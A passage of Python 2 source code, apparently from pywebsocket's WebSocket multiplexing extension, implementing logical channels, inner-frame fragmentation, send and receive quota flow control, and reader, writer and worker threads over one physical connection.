return control_block
def read_control_blocks(self):
"""Reads control block(s).
Raises:
PhysicalConnectionError: when the payload contains invalid control
block(s).
StopIteration: when no control blocks left.
"""
while self._read_position < len(self._data):
first_byte = ord(self._data[self._read_position])
self._read_position += 1
opcode = (first_byte >> 5) & 0x7
control_block = _ControlBlock(opcode=opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
yield self._read_add_channel_request(first_byte, control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
yield self._read_add_channel_response(
first_byte, control_block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
yield self._read_flow_control(first_byte, control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
yield self._read_drop_channel(first_byte, control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
yield self._read_new_channel_slot(first_byte, control_block)
else:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_MUX_OPCODE,
'Invalid opcode %d' % opcode)
assert self._read_position == len(self._data)
raise StopIteration
def remaining_data(self):
"""Returns remaining data."""
return self._data[self._read_position:]
class _LogicalRequest(object):
"""Mimics mod_python request."""
def __init__(self, channel_id, command, path, protocol, headers,
connection):
"""Constructs an instance.
Args:
channel_id: the channel id of the logical channel.
command: HTTP request command.
            path: HTTP request path.
            protocol: HTTP protocol version string.
headers: HTTP headers.
connection: _LogicalConnection instance.
"""
self.channel_id = channel_id
self.method = command
self.uri = path
self.protocol = protocol
self.headers_in = headers
self.connection = connection
self.server_terminated = False
self.client_terminated = False
def is_https(self):
"""Mimics request.is_https(). Returns False because this method is
used only by old protocols (hixie and hybi00).
"""
return False
class _LogicalConnection(object):
"""Mimics mod_python mp_conn."""
# For details, see the comment of set_read_state().
STATE_ACTIVE = 1
STATE_GRACEFULLY_CLOSED = 2
STATE_TERMINATED = 3
def __init__(self, mux_handler, channel_id):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
channel_id: channel id of this connection.
"""
self._mux_handler = mux_handler
self._channel_id = channel_id
self._incoming_data = ''
# - Protects _waiting_write_completion
# - Signals the thread waiting for completion of write by mux handler
self._write_condition = threading.Condition()
self._waiting_write_completion = False
self._read_condition = threading.Condition()
self._read_state = self.STATE_ACTIVE
def get_local_addr(self):
"""Getter to mimic mp_conn.local_addr."""
return self._mux_handler.physical_connection.get_local_addr()
local_addr = property(get_local_addr)
def get_remote_addr(self):
"""Getter to mimic mp_conn.remote_addr."""
return self._mux_handler.physical_connection.get_remote_addr()
remote_addr = property(get_remote_addr)
def get_memorized_lines(self):
"""Gets memorized lines. Not supported."""
raise MuxUnexpectedException('_LogicalConnection does not support '
'get_memorized_lines')
def write(self, data):
"""Writes data. mux_handler sends data asynchronously. The caller will
        be suspended until the write is done.
Args:
data: data to be written.
Raises:
MuxUnexpectedException: when called before finishing the previous
write.
"""
try:
self._write_condition.acquire()
if self._waiting_write_completion:
raise MuxUnexpectedException(
'Logical connection %d is already waiting the completion '
'of write' % self._channel_id)
self._waiting_write_completion = True
self._mux_handler.send_data(self._channel_id, data)
self._write_condition.wait()
# TODO(tyoshino): Raise an exception if woke up by on_writer_done.
finally:
self._write_condition.release()
def write_control_data(self, data):
"""Writes data via the control channel. Don't wait finishing write
because this method can be called by mux dispatcher.
Args:
data: data to be written.
"""
self._mux_handler.send_control_data(data)
def on_write_data_done(self):
"""Called when sending data is completed."""
try:
self._write_condition.acquire()
if not self._waiting_write_completion:
raise MuxUnexpectedException(
'Invalid call of on_write_data_done for logical '
'connection %d' % self._channel_id)
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def on_writer_done(self):
"""Called by the mux handler when the writer thread has finished."""
try:
self._write_condition.acquire()
self._waiting_write_completion = False
self._write_condition.notify()
finally:
self._write_condition.release()
def append_frame_data(self, frame_data):
"""Appends incoming frame data. Called when mux_handler dispatches
frame data to the corresponding application.
Args:
frame_data: incoming frame data.
"""
self._read_condition.acquire()
self._incoming_data += frame_data
self._read_condition.notify()
self._read_condition.release()
def read(self, length):
"""Reads data. Blocks until enough data has arrived via physical
connection.
Args:
length: length of data to be read.
Raises:
            LogicalConnectionClosedException: when the closing handshake for
                this logical channel has been received.
            ConnectionTerminatedException: when the physical connection has
                closed, or an error occurred on the reader thread.
"""
self._read_condition.acquire()
while (self._read_state == self.STATE_ACTIVE and
len(self._incoming_data) < length):
self._read_condition.wait()
try:
if self._read_state == self.STATE_GRACEFULLY_CLOSED:
raise LogicalConnectionClosedException(
'Logical channel %d has closed.' % self._channel_id)
elif self._read_state == self.STATE_TERMINATED:
raise ConnectionTerminatedException(
                    'Receiving %d bytes failed. Logical channel (%d) closed' %
(length, self._channel_id))
value = self._incoming_data[:length]
self._incoming_data = self._incoming_data[length:]
finally:
self._read_condition.release()
return value
def set_read_state(self, new_state):
"""Sets the state of this connection. Called when an event for this
connection has occurred.
Args:
            new_state: state to be set. new_state must be one of the
                following:
                - STATE_GRACEFULLY_CLOSED: when the closing handshake for
                  this connection has been received.
                - STATE_TERMINATED: when the physical connection has closed,
                  or a DropChannel for this connection has been received.
"""
self._read_condition.acquire()
self._read_state = new_state
self._read_condition.notify()
self._read_condition.release()
class _InnerMessage(object):
"""Holds the result of _InnerMessageBuilder.build().
"""
def __init__(self, opcode, payload):
self.opcode = opcode
self.payload = payload
class _InnerMessageBuilder(object):
"""A class that holds the context of inner message fragmentation and
builds a message from fragmented inner frame(s).
"""
def __init__(self):
self._control_opcode = None
self._pending_control_fragments = []
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
def _handle_first(self, frame):
if frame.opcode == common.OPCODE_CONTINUATION:
raise InvalidFrameException('Sending invalid continuation opcode')
if common.is_control_opcode(frame.opcode):
return self._process_first_fragmented_control(frame)
else:
return self._process_first_fragmented_message(frame)
def _process_first_fragmented_control(self, frame):
self._control_opcode = frame.opcode
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_control
return None
return self._reassemble_fragmented_control()
def _process_first_fragmented_message(self, frame):
self._message_opcode = frame.opcode
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
self._frame_handler = self._handle_fragmented_message
return None
return self._reassemble_fragmented_message()
def _handle_fragmented_control(self, frame):
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented control '
'message' % frame.opcode)
self._pending_control_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_control()
def _reassemble_fragmented_control(self):
opcode = self._control_opcode
payload = ''.join(self._pending_control_fragments)
self._control_opcode = None
self._pending_control_fragments = []
if self._message_opcode is not None:
self._frame_handler = self._handle_fragmented_message
else:
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def _handle_fragmented_message(self, frame):
# Sender can interleave a control message while sending fragmented
# messages.
if common.is_control_opcode(frame.opcode):
if self._control_opcode is not None:
                raise MuxUnexpectedException(
                    'Should not reach here (bug in builder)')
return self._process_first_fragmented_control(frame)
if frame.opcode != common.OPCODE_CONTINUATION:
raise InvalidFrameException(
'Sending invalid opcode %d while sending fragmented message' %
frame.opcode)
self._pending_message_fragments.append(frame.payload)
if not frame.fin:
return None
return self._reassemble_fragmented_message()
def _reassemble_fragmented_message(self):
opcode = self._message_opcode
payload = ''.join(self._pending_message_fragments)
self._message_opcode = None
self._pending_message_fragments = []
self._frame_handler = self._handle_first
return _InnerMessage(opcode, payload)
def build(self, frame):
"""Build an inner message. Returns an _InnerMessage instance when
the given frame is the last fragmented frame. Returns None otherwise.
Args:
frame: an inner frame.
Raises:
            InvalidFrameException: when an invalid opcode is received (e.g.
                a non-continuation data opcode arrives while the fin flag of
                the previous inner frame was not set).
"""
return self._frame_handler(frame)
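# Illustrative sketch (hypothetical frame values) of how the builder
# reassembles a fragmented text message with an interleaved control frame:
#
#     builder = _InnerMessageBuilder()
#     builder.build(Frame(fin=0, opcode=common.OPCODE_TEXT, payload='He'))
#     # -> None (the text message is still open)
#     builder.build(Frame(fin=1, opcode=common.OPCODE_PING, payload=''))
#     # -> _InnerMessage(OPCODE_PING, '')
#     builder.build(Frame(fin=1, opcode=common.OPCODE_CONTINUATION,
#                         payload='llo'))
#     # -> _InnerMessage(OPCODE_TEXT, 'Hello')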
class _LogicalStream(Stream):
"""Mimics the Stream class. This class interprets multiplexed WebSocket
frames.
"""
def __init__(self, request, stream_options, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
stream_options: StreamOptions instance.
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
# Physical stream is responsible for masking.
stream_options.unmask_receive = False
Stream.__init__(self, request, stream_options)
self._send_closed = False
self._send_quota = send_quota
# - Protects _send_closed and _send_quota
# - Signals the thread waiting for send quota replenished
self._send_condition = threading.Condition()
# The opcode of the first frame in messages.
self._message_opcode = common.OPCODE_TEXT
# True when the last message was fragmented.
self._last_message_was_fragmented = False
self._receive_quota = receive_quota
self._write_inner_frame_semaphore = threading.Semaphore()
self._inner_message_builder = _InnerMessageBuilder()
def _create_inner_frame(self, opcode, payload, end=True):
frame = Frame(fin=end, opcode=opcode, payload=payload)
for frame_filter in self._options.outgoing_frame_filters:
frame_filter.filter(frame)
if len(payload) != len(frame.payload):
raise MuxUnexpectedException(
'Mux extension must not be used after extensions which change '
                'frame boundary')
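        # The first byte mirrors the base WebSocket framing layout:
        # FIN (1 bit), RSV1-RSV3 (3 bits), opcode (4 bits).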
first_byte = ((frame.fin << 7) | (frame.rsv1 << 6) |
(frame.rsv2 << 5) | (frame.rsv3 << 4) | frame.opcode)
return chr(first_byte) + frame.payload
def _write_inner_frame(self, opcode, payload, end=True):
payload_length = len(payload)
write_position = 0
try:
            # An inner frame will be fragmented if there is not enough send
# quota. This semaphore ensures that fragmented inner frames are
# sent in order on the logical channel.
# Note that frames that come from other logical channels or
# multiplexing control blocks can be inserted between fragmented
# inner frames on the physical channel.
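            # Fragmentation sketch (hypothetical numbers): with a send quota
            # of 3 octets and an 8-octet payload, the payload goes out as
            # several inner frames, the first carrying the original opcode
            # and the rest OPCODE_CONTINUATION, each consuming quota as it
            # becomes available.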
self._write_inner_frame_semaphore.acquire()
# Consume an octet quota when this is the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
self._request.channel_id)
self._send_quota -= 1
finally:
self._send_condition.release()
while write_position < payload_length:
try:
self._send_condition.acquire()
while (not self._send_closed) and self._send_quota == 0:
self._logger.debug(
                        'No quota. Waiting for FlowControl message for %d.' %
self._request.channel_id)
self._send_condition.wait()
if self._send_closed:
raise BadOperationException(
'Logical connection %d is closed' %
                            self._request.channel_id)
remaining = payload_length - write_position
write_length = min(self._send_quota, remaining)
inner_frame_end = (
end and
(write_position + write_length == payload_length))
inner_frame = self._create_inner_frame(
opcode,
payload[write_position:write_position+write_length],
inner_frame_end)
self._send_quota -= write_length
self._logger.debug('Consumed quota=%d, remaining=%d' %
(write_length, self._send_quota))
finally:
self._send_condition.release()
# Writing data will block the worker so we need to release
# _send_condition before writing.
self._logger.debug('Sending inner frame: %r' % inner_frame)
self._request.connection.write(inner_frame)
write_position += write_length
opcode = common.OPCODE_CONTINUATION
except ValueError, e:
raise BadOperationException(e)
finally:
self._write_inner_frame_semaphore.release()
def replenish_send_quota(self, send_quota):
"""Replenish send quota."""
try:
self._send_condition.acquire()
if self._send_quota + send_quota > 0x7FFFFFFFFFFFFFFF:
self._send_quota = 0
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_SEND_QUOTA_OVERFLOW)
self._send_quota += send_quota
self._logger.debug('Replenished send quota for channel id %d: %d' %
(self._request.channel_id, self._send_quota))
finally:
self._send_condition.notify()
self._send_condition.release()
def consume_receive_quota(self, amount):
"""Consumes receive quota. Returns False on failure."""
if self._receive_quota < amount:
self._logger.debug('Violate quota on channel id %d: %d < %d' %
(self._request.channel_id,
self._receive_quota, amount))
return False
self._receive_quota -= amount
return True
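    # Receive-quota bookkeeping sketch (hypothetical numbers): a first,
    # non-continuation frame with a 10-byte payload consumes 11 octets
    # (payload plus one octet for the opcode); _receive_frame() below
    # replenishes the same amount back to the client via FlowControl.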
def send_message(self, message, end=True, binary=False):
"""Override Stream.send_message."""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
if binary:
opcode = common.OPCODE_BINARY
else:
opcode = common.OPCODE_TEXT
message = message.encode('utf-8')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
if self._last_message_was_fragmented:
if opcode != self._message_opcode:
raise BadOperationException('Message types are different in '
'frames for the same message')
opcode = common.OPCODE_CONTINUATION
else:
self._message_opcode = opcode
self._write_inner_frame(opcode, message, end)
self._last_message_was_fragmented = not end
def _receive_frame(self):
"""Overrides Stream._receive_frame.
        In addition to calling Stream._receive_frame, this method adds the
        amount of payload to the receive quota and sends FlowControl to the
        client.
We need to do it here because Stream.receive_message() handles
control frames internally.
"""
opcode, payload, fin, rsv1, rsv2, rsv3 = Stream._receive_frame(self)
amount = len(payload)
        # Replenish one extra octet when receiving the first fragmented frame.
if opcode != common.OPCODE_CONTINUATION:
amount += 1
self._receive_quota += amount
frame_data = _create_flow_control(self._request.channel_id,
amount)
self._logger.debug('Sending flow control for %d, replenished=%d' %
(self._request.channel_id, amount))
self._request.connection.write_control_data(frame_data)
return opcode, payload, fin, rsv1, rsv2, rsv3
def _get_message_from_frame(self, frame):
"""Overrides Stream._get_message_from_frame.
"""
try:
inner_message = self._inner_message_builder.build(frame)
except InvalidFrameException:
raise LogicalChannelError(
self._request.channel_id, _DROP_CODE_BAD_FRAGMENTATION)
if inner_message is None:
return None
self._original_opcode = inner_message.opcode
return inner_message.payload
def receive_message(self):
"""Overrides Stream.receive_message."""
# Just call Stream.receive_message(), but catch
# LogicalConnectionClosedException, which is raised when the logical
# connection has closed gracefully.
try:
return Stream.receive_message(self)
except LogicalConnectionClosedException, e:
self._logger.debug('%s', e)
return None
def _send_closing_handshake(self, code, reason):
"""Overrides Stream._send_closing_handshake."""
body = create_closing_handshake_body(code, reason)
self._logger.debug('Sending closing handshake for %d: (%r, %r)' %
(self._request.channel_id, code, reason))
self._write_inner_frame(common.OPCODE_CLOSE, body, end=True)
self._request.server_terminated = True
def send_ping(self, body=''):
"""Overrides Stream.send_ping"""
self._logger.debug('Sending ping on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PING, body, end=True)
self._ping_queue.append(body)
def _send_pong(self, body):
"""Overrides Stream._send_pong"""
self._logger.debug('Sending pong on logical channel %d: %r' %
(self._request.channel_id, body))
self._write_inner_frame(common.OPCODE_PONG, body, end=True)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason=''):
"""Overrides Stream.close_connection."""
# TODO(bashi): Implement
self._logger.debug('Closing logical connection %d' %
self._request.channel_id)
self._request.server_terminated = True
def stop_sending(self):
"""Stops accepting new send operation (_write_inner_frame)."""
self._send_condition.acquire()
self._send_closed = True
self._send_condition.notify()
self._send_condition.release()
class _OutgoingData(object):
"""A structure that holds data to be sent via physical connection and
origin of the data.
"""
def __init__(self, channel_id, data):
self.channel_id = channel_id
self.data = data
class _PhysicalConnectionWriter(threading.Thread):
"""A thread that is responsible for writing data to physical connection.
    TODO(bashi): Make sure there is no thread-safety problem when the reader
    thread reads data from the same socket at the same time.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
# When set, make this thread stop accepting new data, flush pending
# data and exit.
self._stop_requested = False
# The close code of the physical connection.
self._close_code = common.STATUS_NORMAL_CLOSURE
# Deque for passing write data. It's protected by _deque_condition
# until _stop_requested is set.
self._deque = collections.deque()
# - Protects _deque, _stop_requested and _close_code
# - Signals threads waiting for them to be available
self._deque_condition = threading.Condition()
def put_outgoing_data(self, data):
"""Puts outgoing data.
Args:
data: _OutgoingData instance.
Raises:
BadOperationException: when the thread has been requested to
terminate.
"""
try:
self._deque_condition.acquire()
if self._stop_requested:
raise BadOperationException('Cannot write data anymore')
self._deque.append(data)
self._deque_condition.notify()
finally:
self._deque_condition.release()
def _write_data(self, outgoing_data):
message = (_encode_channel_id(outgoing_data.channel_id) +
outgoing_data.data)
try:
self._mux_handler.physical_stream.send_message(
message=message, end=True, binary=True)
except Exception, e:
util.prepend_message_to_exception(
'Failed to send message to %r: ' %
(self._mux_handler.physical_connection.remote_addr,), e)
raise
# TODO(bashi): It would be better to block the thread that sends
# control data as well.
if outgoing_data.channel_id != _CONTROL_CHANNEL_ID:
self._mux_handler.notify_write_data_done(outgoing_data.channel_id)
def run(self):
try:
self._deque_condition.acquire()
while not self._stop_requested:
if len(self._deque) == 0:
self._deque_condition.wait()
continue
outgoing_data = self._deque.popleft()
self._deque_condition.release()
self._write_data(outgoing_data)
self._deque_condition.acquire()
# Flush deque.
#
# At this point, self._deque_condition is always acquired.
try:
while len(self._deque) > 0:
outgoing_data = self._deque.popleft()
self._write_data(outgoing_data)
finally:
self._deque_condition.release()
# Close physical connection.
try:
            # Don't wait for the response here. The response will be read
# by the reader thread.
self._mux_handler.physical_stream.close_connection(
self._close_code, wait_response=False)
except Exception, e:
                util.prepend_message_to_exception(
                    'Failed to close the physical connection: ', e)
raise
finally:
self._mux_handler.notify_writer_done()
def stop(self, close_code=common.STATUS_NORMAL_CLOSURE):
"""Stops the writer thread."""
self._deque_condition.acquire()
self._stop_requested = True
self._close_code = close_code
self._deque_condition.notify()
self._deque_condition.release()
class _PhysicalConnectionReader(threading.Thread):
"""A thread that is responsible for reading data from physical connection.
"""
def __init__(self, mux_handler):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self.setDaemon(True)
def run(self):
while True:
try:
physical_stream = self._mux_handler.physical_stream
message = physical_stream.receive_message()
if message is None:
break
# Below happens only when a data message is received.
opcode = physical_stream.get_last_received_opcode()
if opcode != common.OPCODE_BINARY:
self._mux_handler.fail_physical_connection(
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE,
'Received a text message on physical connection')
break
except ConnectionTerminatedException, e:
self._logger.debug('%s', e)
break
try:
self._mux_handler.dispatch_message(message)
except PhysicalConnectionError, e:
self._mux_handler.fail_physical_connection(
e.drop_code, e.message)
break
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
except Exception, e:
self._logger.debug(traceback.format_exc())
break
self._mux_handler.notify_reader_done()
class _Worker(threading.Thread):
"""A thread that is responsible for running the corresponding application
handler.
"""
def __init__(self, mux_handler, request):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
request: _LogicalRequest instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self._request = request
self.setDaemon(True)
def run(self):
self._logger.debug('Logical channel worker started. (id=%d)' %
self._request.channel_id)
try:
# Non-critical exceptions will be handled by dispatcher.
self._mux_handler.dispatcher.transfer_data(self._request)
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
finally:
self._mux_handler.notify_worker_done(self._request.channel_id)
class _MuxHandshaker(hybi.Handshaker):
"""Opening handshake processor for multiplexing."""
_DUMMY_WEBSOCKET_KEY = 'dGhlIHNhbXBsZSBub25jZQ=='
def __init__(self, request, dispatcher, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
hybi.Handshaker.__init__(self, request, dispatcher)
self._send_quota = send_quota
self._receive_quota = receive_quota
# Append headers which should not be included in handshake field of
# AddChannelRequest.
        # TODO(bashi): Decide whether we should raise an exception when
        # these headers are already included.
request.headers_in[common.UPGRADE_HEADER] = (
common.WEBSOCKET_UPGRADE_TYPE)
request.headers_in[common.SEC_WEBSOCKET_VERSION_HEADER] = (
str(common.VERSION_HYBI_LATEST))
request.headers_in[common.SEC_WEBSOCKET_KEY_HEADER] = (
self._DUMMY_WEBSOCKET_KEY)
def _create_stream(self, stream_options):
"""Override hybi.Handshaker._create_stream."""
self._logger.debug('Creating logical stream for %d' %
self._request.channel_id)
return _LogicalStream(
self._request, stream_options, self._send_quota,
self._receive_quota)
def _create_handshake_response(self, accept):
"""Override hybi._create_handshake_response."""
response = []
response.append('HTTP/1.1 101 Switching Protocols\r\n')
# Upgrade and Sec-WebSocket-Accept should be excluded.
response.append('%s: %s\r\n' % (
common.CONNECTION_HEADER, common.UPGRADE_CONNECTION_TYPE))
if self._request.ws_protocol is not None:
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_PROTOCOL_HEADER,
self._request.ws_protocol))
if (self._request.ws_extensions is not None and
len(self._request.ws_extensions) != 0):
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_EXTENSIONS_HEADER,
common.format_extensions(self._request.ws_extensions)))
response.append('\r\n')
return ''.join(response)
def _send_handshake(self, accept):
"""Override hybi.Handshaker._send_handshake."""
# Don't send handshake response for the default channel
if self._request.channel_id == _DEFAULT_CHANNEL_ID:
return
handshake_response = self._create_handshake_response(accept)
frame_data = _create_add_channel_response(
self._request.channel_id,
handshake_response)
self._logger.debug('Sending handshake response for %d: %r' %
(self._request.channel_id, frame_data))
self._request.connection.write_control_data(frame_data)
class _LogicalChannelData(object):
"""A structure that holds information about logical channel.
"""
def __init__(self, request, worker):
self.request = request
self.worker = worker
self.drop_code = _DROP_CODE_NORMAL_CLOSURE
self.drop_message = ''
class _HandshakeDeltaBase(object):
"""A class that holds information for delta-encoded handshake."""
def __init__(self, headers):
self._headers = headers
def create_headers(self, delta=None):
"""Creates request headers for an AddChannelRequest that has
delta-encoded handshake.
Args:
            delta: headers that override or remove entries in the base.
"""
headers = copy.copy(self._headers)
if delta:
for key, value in delta.items():
# The spec requires that a header with an empty value is
# removed from the delta base.
                if len(value) == 0 and key in headers:
del headers[key]
else:
headers[key] = value
return headers
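# Illustrative sketch (hypothetical header values) of delta-encoded
# handshake resolution:
#
#     base = _HandshakeDeltaBase({'Host': 'example.com', 'X-Foo': 'bar'})
#     base.create_headers({'X-Foo': ''})     # removes X-Foo from the result
#     base.create_headers({'X-Foo': 'baz'})  # overrides X-Foo with 'baz'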
class _MuxHandler(object):
"""Multiplexing handler. When a handler starts, it launches three
threads; the reader thread, the writer thread, and a worker thread.
The reader thread reads data from the physical stream, i.e., the
ws_stream object of the underlying websocket connection. The reader
thread interprets multiplexed frames and dispatches them to logical
channels. Methods of this class are mostly called by the reader thread.
The writer thread sends multiplexed frames which are created by
logical channels via the physical connection.
The worker thread launched at the starting point handles the
"Implicitly Opened Connection". If multiplexing handler receives
an AddChannelRequest and accepts it, the handler will launch a new worker
thread and dispatch the request to it.
"""
def __init__(self, request, dispatcher):
"""Constructs an instance.
Args:
request: mod_python request of the physical connection.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
"""
self.original_request = request
self.dispatcher = dispatcher
self.physical_connection = request.connection
self.physical_stream = request.ws_stream
self._logger = util.get_class_logger(self)
self._logical_channels = {}
self._logical_channels_condition = threading.Condition()
# Holds client's initial quota
self._channel_slots = collections.deque()
self._handshake_base = None
self._worker_done_notify_received = False
self._reader = None
self._writer = None
def start(self):
"""Starts the handler.
Raises:
MuxUnexpectedException: when the handler already started, or when
opening handshake of the default channel fails.
"""
if self._reader or self._writer:
raise MuxUnexpectedException('MuxHandler already started')
self._reader = _PhysicalConnectionReader(self)
self._writer = _PhysicalConnectionWriter(self)
self._reader.start()
self._writer.start()
# Create "Implicitly Opened Connection".
logical_connection = _LogicalConnection(self, _DEFAULT_CHANNEL_ID)
headers = copy.copy(self.original_request.headers_in)
# Add extensions for logical channel.
headers[common.SEC_WEBSOCKET_EXTENSIONS_HEADER] = (
common.format_extensions(
self.original_request.mux_processor.extensions()))
self._handshake_base = _HandshakeDeltaBase(headers)
logical_request = _LogicalRequest(
_DEFAULT_CHANNEL_ID,
self.original_request.method,
self.original_request.uri,
self.original_request.protocol,
self._handshake_base.create_headers(),
logical_connection)
# Client's send quota for the implicitly opened connection is zero,
# but we will send FlowControl later so set the initial quota to
# _INITIAL_QUOTA_FOR_CLIENT.
self._channel_slots.append(_INITIAL_QUOTA_FOR_CLIENT)
send_quota = self.original_request.mux_processor.quota()
if not self._do_handshake_for_logical_request(
logical_request, send_quota=send_quota):
raise MuxUnexpectedException(
'Failed handshake on the default channel id')
self._add_logical_channel(logical_request)
# Send FlowControl for the implicitly opened connection.
frame_data = _create_flow_control(_DEFAULT_CHANNEL_ID,
_INITIAL_QUOTA_FOR_CLIENT)
logical_request.connection.write_control_data(frame_data)
def add_channel_slots(self, slots, send_quota):
"""Adds channel slots.
Args:
slots: number of slots to be added.
send_quota: initial send quota for slots.
"""
self._channel_slots.extend([send_quota] * slots)
# Send NewChannelSlot to client.
frame_data = _create_new_channel_slot(slots, send_quota)
self.send_control_data(frame_data)
def wait_until_done(self, timeout=None):
"""Waits until all workers are done. Returns False when timeout has
occurred. Returns True on success.
Args:
timeout: timeout in sec.
"""
self._logical_channels_condition.acquire()
try:
while len(self._logical_channels) > 0:
self._logger.debug('Waiting workers(%d)...' %
len(self._logical_channels))
self._worker_done_notify_received = False
self._logical_channels_condition.wait(timeout)
if not self._worker_done_notify_received:
self._logger.debug('Waiting worker(s) timed out')
return False
finally:
self._logical_channels_condition.release()
# Flush pending outgoing data
self._writer.stop()
self._writer.join()
return True
def notify_write_data_done(self, channel_id):
"""Called by the writer thread when a write operation has done.
Args:
channel_id: objective channel id.
"""
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
channel_data.request.connection.on_write_data_done()
else:
self._logger.debug('Seems that logical channel for %d has gone'
% channel_id)
finally:
self._logical_channels_condition.release()
def send_control_data(self, data):
"""Sends data via the control channel.
Args:
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=_CONTROL_CHANNEL_ID, data=data))
def send_data(self, channel_id, data):
"""Sends data via given logical channel. This method is called by
worker threads.
Args:
channel_id: objective channel id.
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=channel_id, data=data))
def _send_drop_channel(self, channel_id, code=None, message=''):
frame_data = _create_drop_channel(channel_id, code, message)
self._logger.debug(
'Sending drop channel for channel id %d' % channel_id)
self.send_control_data(frame_data)
def _send_error_add_channel_response(self, channel_id, status=None):
if status is None:
status = common.HTTP_STATUS_BAD_REQUEST
if status in _HTTP_BAD_RESPONSE_MESSAGES:
message = _HTTP_BAD_RESPONSE_MESSAGES[status]
else:
self._logger.debug('Response message for %d is not found' % status)
message = '???'
response = 'HTTP/1.1 %d %s\r\n\r\n' % (status, message)
frame_data = _create_add_channel_response(channel_id,
encoded_handshake=response,
encoding=0, rejected=True)
self.send_control_data(frame_data)
def _create_logical_request(self, block):
if block.channel_id == _CONTROL_CHANNEL_ID:
# TODO(bashi): Raise PhysicalConnectionError with code 2006
# instead of MuxUnexpectedException.
raise MuxUnexpectedException(
'Received the control channel id (0) as objective channel '
'id for AddChannel')
if block.encoding > _HANDSHAKE_ENCODING_DELTA:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_REQUEST_ENCODING)
method, path, version, headers = _parse_request_text(
block.encoded_handshake)
if block.encoding == _HANDSHAKE_ENCODING_DELTA:
headers = self._handshake_base.create_headers(headers)
connection = _LogicalConnection(self, block.channel_id)
request = _LogicalRequest(block.channel_id, method, path, version,
headers, connection)
return request
def _do_handshake_for_logical_request(self, request, send_quota=0):
try:
receive_quota = self._channel_slots.popleft()
except IndexError:
raise LogicalChannelError(
request.channel_id, _DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION)
handshaker = _MuxHandshaker(request, self.dispatcher,
send_quota, receive_quota)
try:
handshaker.do_handshake()
except handshake.VersionException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(
request.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return False
except handshake.HandshakeException, e:
# TODO(bashi): Should we _Fail the Logical Channel_ with 3001
# instead?
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id,
status=e.status)
return False
except handshake.AbortedByUserException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id)
return False
return True
def _add_logical_channel(self, logical_request):
try:
self._logical_channels_condition.acquire()
if logical_request.channel_id in self._logical_channels:
self._logger.debug('Channel id %d already exists' %
logical_request.channel_id)
raise PhysicalConnectionError(
_DROP_CODE_CHANNEL_ALREADY_EXISTS,
'Channel id %d already exists' %
logical_request.channel_id)
worker = _Worker(self, logical_request)
channel_data = _LogicalChannelData(logical_request, worker)
self._logical_channels[logical_request.channel_id] = channel_data
worker.start()
finally:
self._logical_channels_condition.release()
def _process_add_channel_request(self, block):
try:
logical_request = self._create_logical_request(block)
except ValueError, e:
self._logger.debug('Failed to create logical request: %r' % e)
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return
if self._do_handshake_for_logical_request(logical_request):
if block.encoding == _HANDSHAKE_ENCODING_IDENTITY:
# Update handshake base.
# TODO(bashi): Make sure this is the right place to update
# handshake base.
self._handshake_base = _HandshakeDeltaBase(
logical_request.headers_in)
self._add_logical_channel(logical_request)
else:
self._send_error_add_channel_response(
